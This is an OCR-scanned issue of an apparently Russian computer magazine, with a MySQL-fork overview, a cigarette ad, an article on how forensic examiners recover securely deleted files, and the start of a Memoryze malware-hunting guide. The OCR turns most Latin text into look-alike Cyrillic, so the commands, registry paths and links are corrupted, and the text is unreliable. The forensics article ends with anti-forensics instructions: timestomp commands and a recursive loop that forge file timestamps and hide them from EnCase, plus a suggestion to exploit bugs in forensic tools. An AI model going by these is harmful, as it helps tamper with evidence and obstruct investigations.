Регсопа не идет на поводу у корпораций и все еще предлагает 
версию 5.1, которая с использованием набора патчей обгоняет 
по скорости даже новомодную 5.5, разрекламированную Огасіе. 
Замечательный движок РВХТ, о котором мы говорили в статье, 
как раз спонсировался и вырос в закромах Регсопа. А казалось 
бы — скромные ребята, которые занимаются консалтингом. 



т*ы**іл ыѵлі.н. л*ъя|.| 




Архитектура Напсііегсоскеі-а, системы доступа к ІппоОВ 
движку как к N0501. хранилищу. Может и фигня, но 
вдумайся, 750 000 запросов в секунду 



СІоисІ Сотригіпд 

Разработчики другого проекта — Огіггіе — пошли по немного 
другому пути и решили вообще переосмыслить место базы дан- 
ных в инфраструктуре типичного проекта. Вспомнили, что сейчас 
модно: сіоиб сотрибпд, боодіе Ргоіо Ви^егз, масштабируемость, 
многоядерность и прочее. И подумали: база данных также должна 
двигаться вместе с современными технологиями, а не плестись 
в конце, вне зависимости оттого, что на ней крутится — бло- 
говый движок или крупная корпоративная СРМ-система. Под 
шумок было решено упростить функционал оригинальной Му5СІІ_, 
выкинув тянущиеся из релиза в релиз возможности, которые в 
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ЫоБСИ-тренд 



Ты наверняка знаешь о новомодном тренде І\Іо50І_. По сути, это 
отказ от традиционного сервера базы данных с его таблицами и 
8СН_-за проса ми и уход к самой простой схеме хранения данных 
«ключ-значение» (кеу-ѵаіие). Для реализации последнего часто 
используются продвинутые типы данных вроде списков/хэшей (в 
Ресііз) или, например, формата Т80Ы (в МопдойВ). Но что меша- 
ет скрестить удава и ежа, используя, с одной стороны, всю мощь 
и годами отработанную технологию баз данных и их движков, а с 
другой — упрощенный протокол и отказ от громоздкой прослой- 
ки в виде обработки 50І_-языка запросов? Суровым наследни- 
кам самураев не помешало ничего: японские парни из УобЫпогі 
МаІзипоЬи сделали плагин НапсИегЗоскеІ, превращающий стан- 
дартный движок ІппойВ в продвинутое І\Іо50І_-хранилище, не 
мешая при этом работе обычного 501. Скорость работы впечат- 
ляет: до 750 000 операций в секунду! Неудивительно, что компа- 
ния Регсопа сразу же взяла на вооружение этот плагин, включив 
его в свои сборки сервера. Круто! Но, с другой стороны, как еще 
если не костылем можно назвать решение, которое имитирует 
то, что у нормальной БД типа ОпіЛе реализовано прямо из 
коробки в силу внутренней архитектуры? 

действительности мало кому нужны. Система утратила поддержку 
II N IX- со кето в (это хотя и спорное, но вполне допустимое решение 
ввиду направленности на облачные среды) и версию для ѴѴіпсІоѵѵз. 
В ОпіЛе нет никаких служебных баз и многих других привычных 
вещей. Но что же тогда есть? 

А есть архитектура с микроядром, в которое вынесены все основ- 
ные операции и поддержка протоколов, а также система плагинов, 
позволяющая расширить систему в любую сторону и на любую глу- 
бину. В качестве одной из основных системных компонент исполь- 
зуется бинарный протокол от боодіе — Ргоіосоі ВиІТег. С его помо- 
щью описываются как таблицы, так и данные, он же применяется 
и для репликации. Основной упор в разработке сделан на макси- 
мальную поддержку многопоточности и многопроцессорности, так 
что масштабируемость — это основное достижение разработчиков. 
Реализована поддержка как стандартного Му50І_-протокола, так и 
собственного варианта — через библиотеку ІіЬсІгІ 22 Іе и драйвера 
для большинства популярных языков, включая Регі, РНР, Руібоп 
и І_иа. При желании можно использовать клиентскую библиотеку 
и без самого сервера: в этом случае ты получишь эффектив- 
ный асинхронный доступ к любимому Му50І_. Поскольку эта же 
компания разработала и систему Оеагтап (см. наш материал о 
распределенных системах на РНР), то в ОтЛе есть встроенная 



поддержка логирования в распределенной среде, нативное кэши- 
рование в тетсасЬе и даже такие продвинутые возможности, как 
репликация через системы сообщений типа РаЫэііМО (использу- 
ется в том числе новомодная технология ѴѴеЬЗоскеі). В качестве 
основного движка хранения данных в ОпіЛе используется осо- 
бая версия ІппойВ, значительно переработанная и дополненная 
набором сторонних патчей. Также доступны движки ХігаОВ и РВХТ. 
Если первые версии 0гІ22Іе основывались на Му50І_ 5.0, то теперь 
от оригинальной СУБД осталось немногое. Это почти полностью 
переписанный код с минимальной оглядкой на бывших родствен- 
ников. На данный момент разработка Ог\т.Ле пребывает в актив- 
ном состоянии, и к весне планируется первый стабильный релиз. 

Делаем выводы 

Если ты обеспокоен развитием Му5С!І_, тебе не нравится поли- 
тика Огасіе и ты справедливо опасаешься, что завтра тебя обя- 
жут платить за функционал, который еще вчера был бесплатен, 
посмотри вокруг. Сообщество отреагировало на покупку Му50І_ 
как на начало заката технологии, некогда выведшей современ- 
ный веб на недостижимую высоту благодаря стеку І_АМР (І_іпих- 
АрасЬе-Му50І_-РНР). Ключевые разработчики начали развитие 
собственных форков, некоторые из которых уже сейчас на голову 
превосходят старый Му5СП_. За ними стоят многие знаковые фигу- 
ры и открытое сообщество. Сделав все по уму, разработчики уму- 
дрились оставить 100% внешней совместимости с приложениями 
и протоколами. Поэтому все желающие поставить новый сервер 
не окажутся у разбитого корыта: данные сохранятся, а приложения 
не придется переписывать. Многие вообще не заметят разницы, 
кроме возросшей скорости работы и надежности. 

Уже сейчас ты можешь заменить свой сервер баз данных, так что 
имеющиеся приложения даже не почувствуют разницы, получив 
при этом гораздо большую скорость работы, надежность и массу 
недоступных в оригинальном мускуле фишек. МагіайВ с набором 
движков — отличный вариант для старта. Ну а если ты задумал 
грандиозный проекте большим количеством серверов и гигабай- 
тами данных, посмотри на Опт.Ле. Как программный продукт и как 
сервер баз данных он является очень перспективной разработкой, 
которая обязательно выстрелит уже в этом году. Если же хочется 
стабильности и поддержки самыми лучшими специалистами по 
базам данных — не бойся отвернуться от Огасіе и пойти к Регсопа. 
Ребята раздают бесплатно свою версию СУБД — исправляя, 
насколько это возможно, баги и добавляя фичи для увеличения 
производительности оригинального Му50І_, не нарушая при этом 
совместимости. Ты все еще сидишь на стареньком мускуле? Тогда 
мы идем к тебе! ц-ц 



Огіггіе благодаря простой микроядерной и платинной 
архитектуре умеет многое 
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ОТЛИЧНЫЙ ВКУС - ОТЛИЧНАЯ ПАЧКА - ОТЛИЧНАЯ ЦВНА 



МАКСИМАЛЬНАЯ РО 




ПРЕДУПРЕЖДАЕТ: КУРЕНИЕ ВРЕДИТ 
ВАШЕМУ ЗДОРОВЬЮ 





о Для следователя, проводящего анализ компьютера подозреваемого, 
удаленные файлы всегда представляют особый интерес. Некоторым 
кажется, что если перезаписать область, где находились данные, 
случайными значениями, то восстановить уже ничего не удастся. Зто 
правда, но лишь отчасти. Даже после такой перестраховки файлы 
нередко удается извлечь! 



ФАИЛЫ-ПРИЗРАКИ, 
ИЛИ ОХОТНИКИ 
ЗА ПРИВИДЕНИЯМИ 

Как криминалисты восстанавливают надежно 
удаленные данные? 
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Что происходит при удалении файла? Очень просто: в файло- 
вой системе для него меняется один атрибут, и таким образом 
он помечается как удаленный. При этом содержание файла 
по-прежнему остается на жестком диске, и его можно восстано- 
вить с помощью одной из множества платных и бесплатных про- 
грамм (например, Р-Эіисііо). Мы много раз писали о том, как без- 
опасно удалить файлы без возможности восстановления. Благо 
для этого разработано огромное количество утилит-шредеров, 
которые с помощью несложных методик перезаписывают участки 
диска, на которых были расположены удаленные данные. Таким 
образом даже при использовании технологий восстановления, 
при которых производится считывание данных непосредственно 
с магнитных носителей, восстановить удаленные файлы будет 
невозможно. В эффективности такого подхода нас заверяли даже 
настоящие профессионалы в области восстановления данных. Но 

— лазейки для извлечения информации у гуру все-таки есть! 

Файлы изображений 

Начнем с рассмотрения простого случая — удаления обычной 
фотографии. Допустим, у нас есть папка с фотографиями, и мы 
избавляемся от одной из них. Причем удаляем по всем правилам, 
перезаписав нужную область диска несколько раз. По идее больше 
ничего не должно выдавать ее существования (если мы сами до 
этого не скопировали ее в другую папку и не забыли про это). Но 
тут-то как раз многие и забывают об одной особенности ѴѴіпсІоѵѵз 

— файле ТЬиппЬз.сІЬ. Это специальное хранилище, используемое 
операционной системой, в котором находятся эскизы изображений 




Изображение уже удалено, а эскиз остался 
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Первоначальное состояние — число изображений 
совпадает с числом эскизов в файле ТНитЬз.сІЬ 



Удаление картинки с предварительной перезаписью 
при помощи программы зсіеіеіе 

из текущей папки. Если в проводнике выбрать режим отображения 
«Эскизы страниц», то операционка будет брать уменьшенные пре- 
вьюшки изображений как раз из этого файла. Он создается в каждой 
папке, в которой есть картинки, и содержит уменьшенные эскизы 
изображений в формате ЗРЕѲ (вне зависимости от формата исходно- 
го изображения). 

Проведем небольшой эксперимент — создадим папку и поместим 
туда три любых картинки. Теперь откроем эту директорию в прово- 
днике — появился ТЬитЬз.сІЬ (чтобы увидеть этот файл, надо вклю- 
чить отображение скрытых файлов). Мы можем просмотреть и про- 
анализировать его с помощью утилиты ТЬиплЬпаіІ ОаІаЬазе Ѵіеѵѵег 
( іІзатрІез.сотЛЬитЬпаіІ-баІаЬазе-ѵіеѵѵег.ЬітІ ). Программа, как и 
положено, показывает эскизы для всех трех файлов. А теперь уда- 
лим один из них с помощью программы ЗРеІеІе ( іесЬпеТтісгозо^. 
соітѴги-ги/5Ѵ5ІпІегпаІ5/ЬЬ897443 ) или любой другой программы для 
безопасного удаления данных: зсіеІеСе . ехе -р 2 Тііеіорд 
Параметр -р отвечает за количество проходов шредера, то есть 
указывает, сколько раз файл будет перезаписан перед удалением. 

В результате изображение будет безвозвратно стерто с жесткого 
диска. Но посмотрим, повлияло ли как-то это удаление на ТЬиппЬз. 
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сІЬ? Заново открываем его, и что мы видим? Эскиз для удаленной 
картинки по-прежнему на месте! Получается, что файл легко может 
содержать эскизы уже удаленных изображений. И на этом, как мне 
рассказывали, попался не один умный человек... 

Как этого избежать? Очень просто — нужно отключить кэши- 
рование эскизов в файлах Тбитбз.сіб. На ѴѴіпсІоѵѵз ХР необхо- 
димо установить для ключа 0153616160006031103066 в разделе 
Н К ЕУ_С II Р Р Е N Т_ II 5 Е Р\5 о [Іѵѵа ге\ М і с го 5 о ^\ѴѴ і п 6 о\л/б\С и г ге п I Ѵе га і о п\ 
ЕхрІогег\А6ѵапсесІ значение «1». В ѴѴіпсІоѵѵз 7 этот ключ имеет имя 
ЫоТбитбпаіІСасбе и находится в НКЕУ_СІІРРЕМТ_ІІ5ЕР\5о^Іѵѵаге\ 
МісгозоІі\ѴѴіпбоѵѵ5\СиггепіѴег5Іоп\РоІісіе5\Ехр1.огег. И, само собой, 
важно не забыть удалить все Тбитбз.сіб. 



Правда и мифы о магнитной 
микроскопии 



Очень часто люди впадают в две крайности. Одни откровен- 
но забивают на свою безопасность и хранят на винте всю 
компрометирующую информацию, будучи уверенными, что 
<56і11+0еІе1:е> их спасет. Другие же, наоборот, каждый день 
затирают винт и заново устанавливают операционку. Быть 
может, я утрирую. Тем не менее, довольно часто приходится 
читать в Сети споры о том, сколько же раз надо перезаписать 
винт, чтобы информацию невозможно было восстановить. 
Предлагаю опытным путем выяснить, хватит ли одной полной 
перезаписи, чтобы безвозвратно удалить все данные. Итак, 
опять возьмем нашу подопытную флешку и полностью переза- 
пишем ее нулями, после чего отформатируем в 1МТЕ5. Для про- 
верки закинем на нее какой-нибудь файл: пусть это будет опять 
же ТРЕО. Его легко можно найти в ѴѴіпНех’е по сигнатуре «фіЬ. У 
меня он расположился по смещению 274432. Ну что ж, запустим 
шредер (я юзал НйО ѴѴіре Тооі) и затрем весь диск. Теперь, если 
посмотреть в ѴѴіпНех, что расположилось по смещению 274432, 
то мы увидим только нули. Для успокоения и большей уверен- 
ности можно попробовать восстановить данные с помощью 
ОізкОіддег, Рбоіогес, Еогетозі и прочих утилит. Но это заведомо 
пустая трата времени — ничего у них не выйдет. 

«Хорошо, — скажешь ты, — а как же насчет серьезных приборов, 
имеющихся у компетентных органов, которые умеют восстанав- 
ливать данные?» Ну что ж, давай поговорим о магнитной микро- 
скопии. Суть метода в том, чтобы определить состояние каждого 
бита до его перезаписи. То есть, был ли он равен единице или 
нулю. Возьмем текст в кодировке АВС 1 1 . Каждый символ коди- 
руется восемью битами таким образом, что если даже всего 
один бит восстановлен неверно — получается совсем другой 
символ. Например, есть последовательность символов «апб», 
выглядящая в бинарном виде следующим образом: 01 10000101 
101 1 1001 1 1010001 101001. Предположим, что магнитная микро- 
скопия правильно определила все биты, кроме последнего — в 
результате такого восстановления мы получаем последователь- 
ность «апіб». Неувязочка получается. И это мы говорим о про- 
стейшем текстовом файле. Представь, что будет в случае со 
структурированными форматами — такими как архивы, файлы 
БД, исполняемые файлы и так далее. Вдобавок к этому метод 
достаточно медленный и дорогой. Так что во многих случаях 
использование магнитной микроскопии дает такой же точный 
результат, как и восстановление путем подбрасывания монетки 
на «орел-решка». Поэтому нет никакой необходимости по три 
раза перезаписывать диск. 



Отключение кеширования эскизов в файлах ТНитЬ5.сІЬ 



Исследование содержимого файла подкачки при 
помощи РогетозГ 



Файл подкачки 



Подставы со стороны операционной системы на одном толь- 
ко файле с эскизами не заканчиваются. По мере работы с 
документом информация о нем попадает в различные части 
ОС — временную папку, реестр и так далее. Поэтому очень 
трудно отследить и удалить все связанные с файлом дан- 
ные. Вдобавок ко всему, есть места, где копия файла может 
оказаться совершенно случайно (иногда такая случайность 
может стоить очень дорого). Я говорю о файле подкачки 
(радеіііе.зуз) и свопе памяти, используемом во время режи- 
ма Нібегпаііоп (бібегііі.зуз). Предсказать содержимое файла 
подкачки заведомо невозможно, и тут никто ничего не может 
гарантировать. Предлагаю еще на одном эксперименте убе- 
диться в том, что это — опасное место. 

Поскольку просмотреть или скопировать файл подкачки опера- 
ционная система просто так не дает, то у нас есть два варианта: 
задействовать специальные утилиты или же загрузиться в другую 
операционку и получить доступ к файлу из нее. Мне второй спо- 
соб показался более простым, так как под рукой был Васк Тгаск, 
начиненный различными утилитами, в том числе и для восста- 
новления файлов. Поэтому, загрузившись с ЫѵеСО, я смонтиро- 
вал виндовый раздел и пошел в раздел «ВаскТгаск->Еогепзіс», 
откуда запустил утилиту Еогетозі. Эта замечательная консольная 
прога умеет восстанавливать файлы исходя из их заголовков и 
внутренней структуры. Необходимо лишь передать имя входного 
файла, в котором будет осуществляться поиск, и указать директо- 
рию, куда будут сохранены все найденные данные: 

#:ЕогетозЦ -і /тпЦ/ЬсІаІ/радеіііІе . зуз -о /гооС/ 

БезкСор/раде_і:і1е -ѵ -ц_ 

В качестве входного файла я указал файл подкачки /тпі/ббаі/ 
радебіе.зуз, а директорию для сохранения результатов — /гооі/ 
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Аудиофайлы и файлы изображений, 
записанные следующим образом 
трЗ^|рд^трЗ->|рд->трЗ->|рд 




Искусгвенно созданная разреженность 
файлов 

0езк1:ор/раде_б1е. Программа начала свою работу. За 
короткое время Еогетозі сумел найти и извлечь 524 
файла. 

Статистика извлеченных файлов 

З'рд:= 7 3 
ді5: = 4 
ді5: = 19 
3 Рд : = 77 
3 Рд : = 95 
сіос : = 1 
рдр : = 65 
рдр : = 62 
рдр : = 44 
рдр:= 36 
сіар : = 7 
Іпк : = 3 
соокіе:= 38 

Утилита удобно отсортировала все файлы по типу и 
разложила по разным папкам. Первым делом я полез 
проверять, что же попало в папку ірд. Из всех вос- 
становленных файлов около половины отказалось ото- 



НЕОЖИДАННЫЙ СЮРПРИЗ 
ЖДАЛ МЕНЯ В ПАПКЕ 
С00К1Е- БЕГЛО ПРОЛИСТАВ 
НЕСКОЛЬКО ФАЙЛОВ, 

Я ОБНАРУЖИЛ АДРЕСА 
РОЛИКОВ. КОТОРЫЕ Я 
СМОТРЕЛ ЧУТЬЛИ НЕ ГОД 
НАЗАД НА ѴОІШІВЕ. 

бражаться, зато другая — отлично просматривалась. 

И чего только не было среди картинок: пара фоток, 
которые я не так давно удалил; много мелких изобра- 
жений с веб-сайтов; аватарки друзей из РасеЬоок и 
прочее. Честно сказать, я не планировал обнаружить 
так много изображений. Кроме картинок мне хотелось 
еще узнать, что за единственный бос-файл, который 
попал в файл подкачки. Но, к сожалению, ѴѴогб лишь 
ругнулся, что файл попорчен и не смог его открыть. 
Неожиданный сюрприз ждал меня в папке соокіе 
— бегло пролистав несколько файлов, я обнаружил 
адреса роликов, которые я смотрел чуть ли не год 
назад на ѴоиТиЬе. Вот и еще одно доказательство, что 
даже удалив в браузере все куки и историю, все равно 
можно проколоться. 

Что тут можно сделать? Есть несколько вариан- 
тов. Первый — отключить вообще файл подкачки. 

Для этого надо зайти в «Сопігоі РапеІ->5узІет апб 
5есигіІу->5узІепп-^Абѵапсеб Бузіет БеШпдз^Рег 
1югтапсе->Абѵапсеб->Ѵіг1:иаІ Метогу->С5апде» и 
выбрать опцию «І\Іо радіпд біе». Второй вариант — 
заставить операционную систему затирать все данные 
в файле подкачки перед выключением компьютера. 
Такой режим активируется, если установить для ключа 
СІеагРадеЕіІеАіБбіЛбоѵѵп в разделе НКЕѴ_І_ОСАІ__ 
МАСНІМЕ\5Ѵ5ТЕМ\СиггепіСопІго18еі\СопІгоІ\5ез5Іоп 
Мападег\Метогу Мападетепі значение «1». К сожа- 
лению, второй метод очень медленный, и выключение 
системы будет занимать достаточно длительное время, 
так что применять его на практике или нет — решай 
сам. Аналогичная ситуация и с файлом бібегбі.зуз. Его 




> іпіо 

Программы для 
безопасного удале- 
ния данных: 

• Егазегб.0.8: 
егазег.беібі.іе ; 

• ЗОеІеіе 1 .51 : 
іюсбпебтісгозоб:. 
сот/ги-ги/ 
зузіпіетаіз/ 
55897443 : 

• Егеегазег: собуззеу. 
сот/ргобисіз/ 
Ігеегазег.біті ; 

• Оѵегуѵгке 0.1.5: 
куигг.огд/апбгег/ 
оѵегѵугке.біті : 

• ѴѴіре 2.3.1 : ѵѵіре. 
зоигсеЬгде.пеЦ 

• Зесиге Реіеіе: 
о б]тебіа.бетоп. 
со.ик/ІгееЗоб:ѵѵаге/ 
зесигеРеІеІе.бІппІ ; 

• ССІеапегЗ.ОЗ: 
рігкогт.сот . 




> СІѴСІ 

Все упомянутые в 
статье программы 
ты можешь найти на 
нашем диске. 
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До дефрагментации ОізкЭіддег сумел найти 
три картинки 

также можно попросту отключить, что сэкономит дополнительное 
место на диске. Кстати, исследовать файл подкачки можно и под 
виндой. Но так как операционная система не дает его просмо- 
треть и скопировать с помощью штатных средств, нам понадобит- 
ся программка РТК Ітадег ( ассеззбаІа.сот/гиррогі/абоѵѵпІоасЫ . 
Переходим в раздел «РіІе->АсІсІ Еѵісіепсе Нет» и указываем диск, 
где находится файл подкачки. На панели слева отобразится 
дерево каталогов, где необходимо выбрать радебіе.зуз и вос- 
пользоваться функцией экспорта через контекстное меню. Файл 
подкачки без проблем скопируется в указанную нами папку, и 
никакие блокировки системы с этого момента не помешают его 
анализировать. Для анализа, кстати, можно воспользоваться 
ОізкОіддег ( сіізксііддег.огд ) или РЬоІоРес ( ѵѵѵѵѵѵ.сдзесигііѵ.огд/ѵѵікі/ 
РбоІоРес ]. Первая — проще, но вторая умеет восстанавливать 
более широкий круг различных форматов файлов. 

Дефрагментация 

Перейдем к следующей причине появления файлов-призраков. 
Чтобы было наглядней и понятней — опять же проведем неболь- 
шой эксперимент. Для него нам понадобится флешка и умение 
обращаться с ѴѴіпНех’ом. Сначала обеспечим условия для опыта, 
удалив все данные с флешки. Для этого запустим ѴѴіпНех, отдадим 
команду Ореп Оізк и в появившемся окне выберем наш девайс. 
После открытия полностью выделяем все его содержимое (СМ+А) 
и забиваем нулями (СМ+Ц Одно замечание — процесс перезапи- 
си занимает достаточное количество времени, так что рекомендую 
взять флешку поменьше. С этого момента на драйве нет данных 
и, более того, нет файловой системы. Так что следующим шагом 
будет форматирование флешки в ІЧТР5. По умолчанию ѴѴіпсІ оѵѵз 
ХР дает форматировать флешку только в РАТ, но для наших мани- 
пуляций требуется ІЧТР5. Чтобы операционная система позволила 
отформатировать устройство в нужную нам файловую систему, 
необходимо зайти в диспетчер устройств, найти там флешку и в 
параметрах установить опцию «Орбгтше Фг реМюгтапсе». После 
этого винда сможет отформатировать флешку в КІТР5. 

Цель нашего опыта — посмотреть, что происходит с файлами во 
время дефрагментации. Для этого создадим искусственную фраг- 
ментацию на нашем носителе информации. Возьмем три любых 
)ред-файла и три каких-нибудь аудиофайла или видеоклипа (глав- 
ное, чтобы их размер был больше ] р е д ’ о в ) и скопируем их на флеш- 
ку в следующем порядке: І.трЗ, Ідрд, 2.трЗ, 2дрд, З.трЗ, Здрд. 
Интересно, как же они расположились на диске? Чтобы посмотреть 
это, воспользуемся тулзой ОізкѴіеѵѵ от Марка Руссиновича ( іесИпеР 



тісгозоЛ.сот/ги-ги/зузіпІегпа 1 . 5 / 66896650 ) . Она выводит графиче- 
скую схему диска, на которой можно определить местоположение 
данных или узнать, какой файл занимает те или иные кластеры (для 
этого нужно щелкнуть на кластер мышью). Двойной щелчок позволя- 
ет получить более подробную информацию о файле, которому выде- 
лен кластер. Запускаем программу, выбираем нашу флешку и нажи- 
маем <Ре1те5б>. Сначала идет зеленая полосочка, обозначающая 
системные кластеры, а вот сразу за ней — область синих кластеров, 
представляющих наши файлы, записанные друг за другом. Теперь 
создадим фрагментацию, удалив все аудиофайлы. Снова нажима- 
ем <Ре1те5б> и видим, что перед каждым ]ред-файлом есть пустая 
область. Теперь ненадолго переключимся в ѴѴіпНех. Чтобы еще раз 
убедиться, что на флешке нет никаких лишних графических файлов, 
проведем поиск по сигнатуре: ищем последовательность «]Т \Ь>, при- 
сутствующую в заголовке любого )ред-файла. В итоге редактор, как 
и ожидалось, нашел ровно три таких последовательности, по числу 
оставшихся файлов. Ну что ж, пришло время навести порядок: не 
дело, когда файлы вот так разбросаны по диску :). Запускаем деф- 
рагментацию, столь любимую пользователями, для нашего носителя: 

С : ХБосишепСз апсі ЗеССіпдзХАсішіпізЦгаЦогхіебгад Ь: 
МіпсІоѵ75 Бізк БебгадтепСег 

СоругідЬС (с) 2001 МісгозобС Согр. апсі ЕхесиСіѵе 

ЗобСмаге ІпСегпаСіопаІ , Іпс . 

Апаіузіз КерогС 

7,47 ОВ ТоСаІ , 7,43 ОВ (99%) Ргее, 0% 

РгадгпепСесІ (0% Тііе бгадгпепСаСіоп) 

БеИгадтепСаСіоп КерогС 

7,47 ОВ ТоСаІ , 7,43 ОВ (99%) Ргее, 0% 

РгадшепСесі (0% бііе ТгадшепСаСіоп) 

Дефрагментация прошла, посмотрим, что изменилось на флешке. 
Жмем на <Ре1те5б> в программе ОізкѴіеѵѵ, и что мы видим? Файлы, 
которые располагались на расстоянии друг от друга, аккуратно 
перенесены в начало диска, и располагаются строго последова- 
тельно. А теперь внимание! Дефрагментация скопировала файлы 
в начало диска, расположив их последовательно, но перезаписала 
ли она их предыдущую копию нулями? Чтобы ответить на этот 
вопрос, опять обратимся к мощному шестнадцатиричному редакто- 
ру. Снова проведем поиск по «фііж Оп-па, теперь вместо трех най- 
денных строк получаем целых шесть! И это может означать только 
одно — теперь каждый файл представлен в двух экземплярах. 
Любой из них легко восстанавливается с помощью ОізкОіддег’а 
или Рбоіогес’а. А теперь представь, что вместо графических 
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После дефрагментации файлов йізкОіддег находит 
уже 6 файлов вместо 3 




3 



После перезаписи по смещению 274432 одни нули 



файлов у нас были какие-то конфиденциальные документы или 
файлы с данными по кредиткам. Даже если бы мы использовали 
утилиты типа Зсіеіеіе и переписали перед удалением эти три 
файла сотни раз, их призраки все равно остались бы на диске и 
существовали там неопределенно долгое время. До тех пор, пока 
не будут перезаписаны чем-либо еще. И все это время их можно 
будет восстановить! 

Лучшая защита — 
это нападение 

Что можно сделать, чтобы усложнить жизнь людям, к которым может 
попасть для экспертизы твой компьютер? Тут есть несколько вари- 
антов. В случае, если на компьютере нашли «интересный» файл, 
время его создания будет веским доказательством против его вла- 
дельца. Чтобы проследить цепь событий, эксперты опираются также 
на время создания/доступа/модификации файла. Так почему бы не 
запутать следы? На сайте теІазрІоіТсот есть такая замечательная 
утилита, как Тітезіотр [ теіазрІоіСсот/сІаІа/апбІЪгепБІсБЛіітіеБіоітір. 
ехе ). которая позволяет менять время создания, модификации или 
доступа для заданного файла. Основные опции для ее использования: 



-ш <с!абе> 

задает дату последней модификации файла 
-а <с!абе> 

задает дату последнего доступа к файлу 
-с <с!абе> 

задает время создания файла 
-е <с!абе> 

задает время модификации файла, хранящееся в МРТ 
-г <с!абе> 

задает четыре вышеперечисленных параметра 




..... 

» I 






До перезаписи по смещению 274432 начинается пер- 
вая картинка 




ОізкРіддег не смог найти ни одного файла после одно- 
кратной перезаписи диска 

Дата задается в следующем виде: йауоМеек МопіЬ\Оау\Ѵеаг 
НН:ММ:55 [АМІРМ]. Есть еще очень интересная опция -Ь, кото- 
рая устанавливает вышеперечисленные атрибуты таким образом, 
что известная в кругах компьютерных криминалистов програм- 
ма ЕпСазе их не видит и отображает пустыми :). Таким образом, 
чтобы поменять атрибуты файла, достаточно выполнить в консоли 
команду: С ігпезСошр . ехе ЬооС . іпі -2 "зипсіау 1/12/2099 
10:00: 00 ргп" . Легко можно набросать скриптик, который будет 
рекурсивно менять временные атрибуты файлов. Простейший 
вариант выглядит так: 

бог /К с:\боо1з\ %і іп (*) сЬ Сішезбошр . ехе %і -2 
" шопЛау 3/12/2009 10:00:00 ргп " 

Есть и другие способы подпортить жизнь товарищам-исследователям 
чужих ЕЮО. В своей работе они используют программы, написанные 
обычными людьми, а потому — содержащими ошибки. Да-да, мы 
можем использовать уязвимости программного обеспечения, при- 
меняемого для поиска улик. Подробней об этом можно почитать в 
одном из докладов с конференции йеГСоп: ІБесрагІпегБ.сотЛіІез/ 
іЗЕС-Вгеакіпд Еогепзісз БоЛѵѵаге-Рарег.ѵІ 1 .ВН2007.рсІТ 

Заключение 

«Безопасное удаление данных» — это не панацея. Смею тебя заве- 
рить, что описанные лазейки — не единственные в своем роде. И 
тот, кто по роду деятельности проводит экспертизы компьютеров 
на профессиональном уровне, знает, где и как найти необходимые 
ему данные. Теперь твоя безопасность в твоих руках — не дай 
«охотникам за приведениями» найти ни одного «призрака» на 
твоем компе. А еще лучше — не давай им повода приходить к тебе 
в гости :1. т 
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ін Іѵѵіиег.сот/зІераЬ 



РС_20ЫЕ 



АНАЛИЗАТОР . 

ПАМЯТИ ОФЛАЙН 

Используем Метогуіе для исследования 
системы и поиска малвари 

© Большинство утилит для поиска малвари анализируют систему 
в режиме Ііѵе, то есть во время ее работы. Но мало кто знает о 
существовании программ, которые, помимо прочего, способны 
выполнять так называемые офлайн-исследования, позволяя отыскать 
зло в памяти компьютера, когда ктому нет доступа или он вообще 
выключен. 



Некоторое время назад я открыл для себя новый способ поис- 
ка малвари, которым с тех пор эффективно пользуюсь. По правде 
говоря, основным назначением применяемого инструмента являет- 
ся вовсе не поиск руткитов, а комплексный анализ памяти. Но так 



получилось, что включенные в него техники идеально подходят для 
того, чтобы отыскать хорошо затаившуюся в системе малварь. 

С утилитой Мапсііапі’з Метогуге я познакомился, когда активно 
изучал программные решения для компьютерной криминалистики. 
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Проблемы с загрузкой драйвера Метогуге 

Помимо основной категории продуктов, предназна- 
ченных для глубокого изучения дисковых накопителей, 
широко используются также решения для анализа опе- 
ративной памяти. Такие исследования выделяют в осо- 
бый вид экспертиз — Метогу Рогепзіс. Некоторые из 
приложений (и в том числе Метогуге] умеют не только 
выполнять исследование «живой» системы, но и ана- 
лизировать образ памяти, в который заблаговременно 
было помещено все содержимое оперативной памяти 
компьютера. Это дает большой простор для деятель- 
ности. Имея такой образ, ничто не мешает позже разо- 
браться, какие приложения запущены в системе (на 
момент создания дампа, разумеется) или, например, с 
какими хостами взаимодействуют интересующие нас 
процессы. Ну и само собой, это еще и отличный способ 
для поиска малвари. Можно сделать дамп на проблем- 
ной машине и далее на своем собственном компьютере 
без каких-либо неудобств разбираться, какая ерунда 
загружена в памяти. Тут надо понимать, что в образ 
помещается все содержимое памяти, которое считы- 
вает и анализирует специальный парсер. И какими бы 
продвинутыми методиками для сокрытия активных про- 
цессов и драйверов не пользовалась малварь, их при- 
сутствие обязательно будет отражено в дампе. 

Что такое Метогуге? 

Программу Метогуге в кругах компьютерных кримина- 
листов знают не понаслышке. Это мощнейшее средство 
анализа памяти для многих стало частью джентль- 
менского набора, настоящей программой тизі Ьаѵе, 
которая не просто лежит про запас для подходящего 
случая, а действительно часто используется. Ее созда- 
телями являются Джэми Батлер и Питер Силбермэн, 
два маньяка-хардкорщика в области анализа памяти и 
малвари. Ты можешь прямо сейчас сказать им спасибо, 
потому что они не только разработали замечательный 
инструмент, но еще и делятся им совершенно бес- 
платно. Дистрибутив доступен для загрузки из раз- 
дела с фриварными программами компании Мапсііапі:: 
тапсІіапТсот/ргосІисІз/Ітее зоЙѵѵаге . 

Что мы можем получить, используя Метогуге: 

• полный образ всего диапазона системной памяти (без 
использования АРІ-вызовов), сохраненный в файл для 
дальнейшего анализа; 

• дамп адресного пространства любого процесса, вклю- 
чая список загруженных ОБЕ и ЕХЕ, кучу и стэк (этот 
дамп можно дальше исследовать в дизассемблере); 

• образ всех загруженных драйверов или некоторых из них; 

• полный список всех процессов, включая те, что 
спрятаны руткитами, причем для каждого процесса 
есть возможность определить все хэндлы (например, 




Выбираем образ для анализа 



используемых файлов или ключей реестра), сетевые 
сокеты, импортируемые и экспортируемые функции и 
так далее; 

• все строковые переменные, используемые процессами; 

• полный список всех драйверов, в том числе те, кото- 
рые маскируются малварью; 

• перечень всех модулей ядра; 

• перечисление всех установленных хуков (они часто 
используются малварью); 

• и многое другое. 

Вообще, когда говорят о Метогуге, чаще всего имеют 
в виду не одну, а две утилиты: консольную Метогуге и 
0111-приложение Аибіі Ѵіеѵѵег. Они тесно связаны между 
собой. Метогуге создает дамп и парсит различные 
структуры, чтобы извлечь интересующие данные. Но 
работать в консоли не сильно удобно, поэтому в связке 
используется другая утилита — Аисііі Ѵіеѵѵег, которая 
позволяет работать с извлеченными данными через 
удобный интерфейс. Таким образом можно узнать все 
о том, что в момент создания образа было запущено в 
системе. 

В некоторых ситуациях очень удобно иметь программу 
при себе, поэтому ее лучше всего разместить на флеш- 
ку достаточного объема, чтобы туда поместился еще и 
